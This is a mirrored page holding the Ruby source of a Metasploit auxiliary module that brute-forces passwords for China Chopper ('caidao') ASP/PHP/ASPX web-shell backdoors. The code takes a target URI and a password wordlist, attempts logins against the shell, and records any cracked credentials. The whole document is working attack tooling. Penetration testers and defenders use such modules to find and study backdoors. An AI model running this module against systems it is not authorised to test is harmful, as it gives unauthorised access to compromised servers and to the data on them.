CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/caidao'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::Scanner11include Msf::Auxiliary::Report12include Msf::Auxiliary::AuthBrute1314def initialize(info = {})15super(update_info(info,16'Name' => 'Chinese Caidao Backdoor Bruteforce',17'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',18'Author' => [ 'Nixawk' ],19'References' => [20['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],21['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],22['URL', 'https://www.exploit-db.com/docs/27654.pdf'],23['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],24['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']25],26'License' => MSF_LICENSE27))2829register_options(30[31OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),32OptPath.new('PASS_FILE', [33false,34'The file that contains a list of of probable passwords.',35File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')36])37])3839# caidao does not have an username, there's only password40deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')41end4243def scanner(ip)44@scanner ||= lambda {45cred_collection = build_credential_collection(46# The LoginScanner API refuses to run if there's no username, so we give it a fake one.47# But we will not be reporting this to the database.48username: 'caidao',49password: datastore['PASSWORD']50)5152return Metasploit::Framework::LoginScanner::Caidao.new(53configure_http_login_scanner(54host: ip,55port: datastore['RPORT'],56uri: datastore['TARGETURI'],57cred_details: cred_collection,58stop_on_success: datastore['STOP_ON_SUCCESS'],59bruteforce_speed: datastore['BRUTEFORCE_SPEED'],60connection_timeout: 5,61http_username: datastore['HttpUsername'],62http_password: datastore['HttpPassword']63))64}.call65end6667def report_good_cred(ip, port, result)68service_data = {69address: ip,70port: port,71service_name: 'http',72protocol: 'tcp',73workspace_id: myworkspace_id74}7576credential_data = {77module_fullname: self.fullname,78origin_type: :service,79private_data: result.credential.private,80private_type: :password,81}.merge(service_data)8283login_data = {84core: create_credential(credential_data),85last_attempted_at: DateTime.now,86status: result.status,87proof: result.proof88}.merge(service_data)8990create_credential_login(login_data)91end9293def report_bad_cred(ip, rport, result)94invalidate_login(95address: ip,96port: rport,97protocol: 'tcp',98private: result.credential.private,99realm_key: result.credential.realm_key,100realm_value: result.credential.realm,101status: result.status,102proof: result.proof103)104end105106# Attempts to login107def bruteforce(ip)108scanner(ip).scan! do |result|109case result.status110when Metasploit::Model::Login::Status::SUCCESSFUL111print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential.private}'")112report_good_cred(ip, rport, result)113when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT114vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)115report_bad_cred(ip, rport, result)116when Metasploit::Model::Login::Status::INCORRECT117vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential.private}'")118report_bad_cred(ip, rport, result)119end120end121end122123def run_host(ip)124unless scanner(ip).check_setup125print_brute(:level => :error, :ip => ip, :msg => 'Backdoor type is not support')126return127end128129bruteforce(ip)130end131end132133134